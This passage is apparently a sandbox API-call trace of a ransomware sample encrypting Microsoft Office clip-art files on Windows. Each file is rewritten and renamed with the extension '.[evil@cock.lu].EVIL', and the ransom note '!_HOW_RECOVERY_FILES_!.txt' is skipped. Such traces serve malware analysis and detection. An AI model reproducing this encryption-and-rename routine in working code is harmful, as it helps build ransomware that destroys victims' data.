FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.594] wcsstr (_Str="CRANE.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.594] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF") returned 66 [0114.594] wcscmp (_String1="CRANE.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.594] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="CRANE.WMF") returned 0x0 [0114.594] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF") returned 0x42 [0114.594] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\crane.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.595] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1496, lpOverlapped=0x0) returned 1 [0114.607] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.607] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.607] _errno () returned 0x84b1160840 [0114.607] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.607] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x14a0, lpOverlapped=0x0) returned 1 [0114.608] CloseHandle (hObject=0x1a8) returned 1 [0114.608] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.608] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.608] __uncaught_exception () returned 0x84b1160800 [0114.608] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.608] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\crane.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\crane.wmf.[evil@cock.lu].evil")) returned 1 [0114.609] ??_V@YAXPEAX@Z () returned 0x1 [0114.611] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF", dwFileAttributes=0x200) returned 0 [0114.612] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.612] wcsstr (_Str="CRANINST.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.612] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 69 [0114.612] wcscmp (_String1="CRANINST.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.612] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="CRANINST.WMF") returned 0x0 [0114.612] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 0x45 [0114.612] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\craninst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.614] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc18a, lpOverlapped=0x0) returned 1 [0114.621] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.621] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.622] _errno () returned 0x84b1160840 [0114.622] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.622] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xc1a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xc1a0, lpOverlapped=0x0) returned 1 [0114.622] CloseHandle (hObject=0x1a8) returned 1 [0114.622] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.622] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.622] __uncaught_exception () returned 0x84b1160800 [0114.622] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.622] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\craninst.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\craninst.wmf.[evil@cock.lu].evil")) returned 1 [0114.623] ??_V@YAXPEAX@Z () returned 0x1 [0114.626] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF", dwFileAttributes=0x200) returned 0 [0114.626] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.626] wcsstr (_Str="CUP.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.626] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF") returned 64 [0114.626] wcscmp (_String1="CUP.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.626] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="CUP.WMF") returned 0x0 [0114.626] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF") returned 0x40 [0114.626] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cup.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.628] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb96, lpOverlapped=0x0) returned 1 [0114.635] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.635] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.635] _errno () returned 0x84b1160840 [0114.635] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.635] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xba0, lpOverlapped=0x0) returned 1 [0114.635] CloseHandle (hObject=0x1a8) returned 1 [0114.635] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.635] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.635] __uncaught_exception () returned 0x84b1160800 [0114.635] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.636] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cup.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cup.wmf.[evil@cock.lu].evil")) returned 1 [0114.636] ??_V@YAXPEAX@Z () returned 0x1 [0114.639] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF", dwFileAttributes=0x200) returned 0 [0114.639] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.639] wcsstr (_Str="CUPINST.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.639] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 68 [0114.639] wcscmp (_String1="CUPINST.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.639] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="CUPINST.WMF") returned 0x0 [0114.639] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 0x44 [0114.639] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cupinst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.641] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2856, lpOverlapped=0x0) returned 1 [0114.648] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.648] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.649] _errno () returned 0x84b1160840 [0114.649] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.649] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x2860, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2860, lpOverlapped=0x0) returned 1 [0114.649] CloseHandle (hObject=0x1a8) returned 1 [0114.649] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.649] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.649] __uncaught_exception () returned 0x84b1160800 [0114.649] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.649] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cupinst.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cupinst.wmf.[evil@cock.lu].evil")) returned 1 [0114.650] ??_V@YAXPEAX@Z () returned 0x1 [0114.652] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF", dwFileAttributes=0x200) returned 0 [0114.653] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.653] wcsstr (_Str="DD00117_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.653] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 69 [0114.653] wcscmp (_String1="DD00117_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.653] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD00117_.WMF") returned 0x0 [0114.653] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 0x45 [0114.653] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00117_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.655] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7992, lpOverlapped=0x0) returned 1 [0114.694] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.694] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.694] _errno () returned 0x84b1160840 [0114.694] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.694] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x79a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x79a0, lpOverlapped=0x0) returned 1 [0114.694] CloseHandle (hObject=0x1a8) returned 1 [0114.694] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.695] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.695] __uncaught_exception () returned 0x84b1160800 [0114.695] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.695] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00117_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00117_.wmf.[evil@cock.lu].evil")) returned 1 [0114.696] ??_V@YAXPEAX@Z () returned 0x1 [0114.699] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF", dwFileAttributes=0x200) returned 0 [0114.699] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.699] wcsstr (_Str="DD00121_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.700] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 69 [0114.700] wcscmp (_String1="DD00121_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.700] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD00121_.WMF") returned 0x0 [0114.700] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 0x45 [0114.700] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00121_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.702] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2040, lpOverlapped=0x0) returned 1 [0114.723] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.723] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.723] _errno () returned 0x84b1160840 [0114.723] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.723] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x2060, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2060, lpOverlapped=0x0) returned 1 [0114.723] CloseHandle (hObject=0x1a8) returned 1 [0114.723] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.723] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.723] __uncaught_exception () returned 0x84b1160800 [0114.723] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.724] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00121_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00121_.wmf.[evil@cock.lu].evil")) returned 1 [0114.724] ??_V@YAXPEAX@Z () returned 0x1 [0114.728] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF", dwFileAttributes=0x200) returned 0 [0114.728] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.728] wcsstr (_Str="DD00234_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.728] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 69 [0114.728] wcscmp (_String1="DD00234_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.728] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD00234_.WMF") returned 0x0 [0114.728] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 0x45 [0114.728] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00234_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.730] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x73bc, lpOverlapped=0x0) returned 1 [0114.738] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.738] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.738] _errno () returned 0x84b1160840 [0114.738] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.738] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x73c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x73c0, lpOverlapped=0x0) returned 1 [0114.739] CloseHandle (hObject=0x1a8) returned 1 [0114.739] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.739] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.739] __uncaught_exception () returned 0x84b1160800 [0114.739] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.739] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00234_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00234_.wmf.[evil@cock.lu].evil")) returned 1 [0114.740] ??_V@YAXPEAX@Z () returned 0x1 [0114.742] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF", dwFileAttributes=0x200) returned 0 [0114.743] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.743] wcsstr (_Str="DD00255_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.743] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 69 [0114.743] wcscmp (_String1="DD00255_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.743] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD00255_.WMF") returned 0x0 [0114.743] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 0x45 [0114.743] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00255_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.745] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa82, lpOverlapped=0x0) returned 1 [0114.777] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.777] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.777] _errno () returned 0x84b1160840 [0114.777] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.777] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xaa0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xaa0, lpOverlapped=0x0) returned 1 [0114.777] CloseHandle (hObject=0x1a8) returned 1 [0114.777] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.777] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.777] __uncaught_exception () returned 0x84b1160800 [0114.777] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.777] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00255_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00255_.wmf.[evil@cock.lu].evil")) returned 1 [0114.778] ??_V@YAXPEAX@Z () returned 0x1 [0114.781] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF", dwFileAttributes=0x200) returned 0 [0114.781] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.781] wcsstr (_Str="DD00256_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.781] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 69 [0114.781] wcscmp (_String1="DD00256_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.781] 